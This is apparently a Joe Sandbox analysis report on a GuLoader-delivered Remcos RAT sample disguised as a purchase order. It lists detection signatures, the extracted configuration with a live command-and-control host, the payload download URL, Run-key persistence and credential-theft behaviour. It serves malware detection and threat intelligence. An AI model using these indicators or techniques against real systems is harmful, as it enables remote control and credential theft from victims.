Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase-Order27112024.scr.exe

Overview

General Information

Sample name:Purchase-Order27112024.scr.exe
Analysis ID:1563962
MD5:5e1c814fc675448c381899d325aba145
SHA1:46a9e1b34f90d4be128fc1b6f1d698d79c93297b
SHA256:bf065b1f51eb32228108a6508ff649143a97526a06b27fa6771a85246b162f84
Tags:exeuser-threatinte1
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Purchase-Order27112024.scr.exe (PID: 1492 cmdline: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe" MD5: 5E1C814FC675448C381899D325ABA145)
    • Purchase-Order27112024.scr.exe (PID: 4892 cmdline: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe" MD5: 5E1C814FC675448C381899D325ABA145)
      • Purchase-Order27112024.scr.exe (PID: 3536 cmdline: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\lpbpuoswhxqpduzrodqpwzbywtn" MD5: 5E1C814FC675448C381899D325ABA145)
      • Purchase-Order27112024.scr.exe (PID: 4876 cmdline: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\njgavgdycficoinvfolrymwhxifwkll" MD5: 5E1C814FC675448C381899D325ABA145)
      • Purchase-Order27112024.scr.exe (PID: 6900 cmdline: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xlmtozosqnagqojhoyykjqqygopfdwcbcs" MD5: 5E1C814FC675448C381899D325ABA145)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["mynewpro.online:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B4UZRV", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 4 entries

            System Summary

            barindex
            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe, ProcessId: 4892, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe, ProcessId: 4892, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe, ProcessId: 4892, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe, ProcessId: 4892, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr

            Stealing of Sensitive Information

            barindex
            Source: Registry Key setAuthor: Joe Security: Data: Details: 1C DB 89 90 D4 3B F1 22 6C EB B8 6B D5 3A 97 28 63 B7 C5 CB A6 2A 75 DC 35 C5 26 1F 0D 45 AA B2 0C D6 10 A8 8F D3 AC 14 B3 3E EF 12 F4 B3 ED 0C 4F 23 0B 03 53 39 F4 91 06 3D DF C6 98 C0 0E EB 86 6D A7 93 9F 51 6C 9C 63 EF FB CA A9 C0 1A E5 22 9C 31 53 A5 04 24 FD E9 3F 82 11 33 17 D8 29 CB 3F 13 AC 3B AB B6 3A CA 9C F1 CB D5 E0 FF 93 FA D5 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe, ProcessId: 4892, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-B4UZRV\exepath
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-27T16:50:39.269061+010020365941Malware Command and Control Activity Detected192.168.2.64977694.156.227.1842404TCP
            2024-11-27T16:50:42.081531+010020365941Malware Command and Control Activity Detected192.168.2.64978194.156.227.1842404TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-27T16:50:42.160174+010028033043Unknown Traffic192.168.2.649782178.237.33.5080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-27T16:50:31.292241+010028032702Potentially Bad Traffic192.168.2.649755164.160.91.32443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["mynewpro.online:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B4UZRV", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
            Source: Yara matchFile source: 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 4892, type: MEMORYSTR
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scrJoe Sandbox ML: detected
            Source: Purchase-Order27112024.scr.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,6_2_00404423
            Source: Purchase-Order27112024.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.6:49755 version: TLS 1.2
            Source: Purchase-Order27112024.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_00402770 FindFirstFileW,2_2_00402770
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004057D0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_370010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_370010F1
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_37006580 FindFirstFileExA,2_2_37006580
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0040AE51 FindFirstFileW,FindNextFileW,6_2_0040AE51
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407EF8
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407898

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49781 -> 94.156.227.184:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49776 -> 94.156.227.184:2404
            Source: Malware configuration extractorURLs: mynewpro.online
            Source: global trafficTCP traffic: 192.168.2.6:49776 -> 94.156.227.184:2404
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49782 -> 178.237.33.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49755 -> 164.160.91.32:443
            Source: global trafficHTTP traffic detected: GET /LcyXvOliFVQGOWvhGBwKi128.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /LcyXvOliFVQGOWvhGBwKi128.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FD0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: Purchase-Order27112024.scr.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: Purchase-Order27112024.scr.exe, 00000006.00000002.2587239867.0000000002228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: Purchase-Order27112024.scr.exe, 00000006.00000002.2587239867.0000000002228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600683206.0000000036EE0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600683206.0000000036EE0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: www.healthselflesssupplies.co.za
            Source: global trafficDNS traffic detected: DNS query: mynewpro.online
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
            Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541249987.0000000006468000.00000004.00000020.00020000.00000000.sdmp, bhv2E52.tmp.6.drString found in binary or memory: http://geoplugin.net/json.gp
            Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2541249987.0000000006468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp4n
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpX
            Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpalu
            Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphy
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpq
            Source: Purchase-Order27112024.scr.exe, Perissodactylic.scr.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0:
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0H
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0I
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0Q
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://ocsp.msocsp.com0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://ocsp.msocsp.com0S
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: bhv2E52.tmp.6.drString found in binary or memory: http://www.digicert.com/CPS0~
            Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000003.2567218820.000000000096D000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000003.2567182006.000000000096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FD0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: Purchase-Order27112024.scr.exe, 00000008.00000003.2567218820.000000000096D000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000003.2567182006.000000000096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FD0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: Purchase-Order27112024.scr.exe, 00000006.00000002.2586522096.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
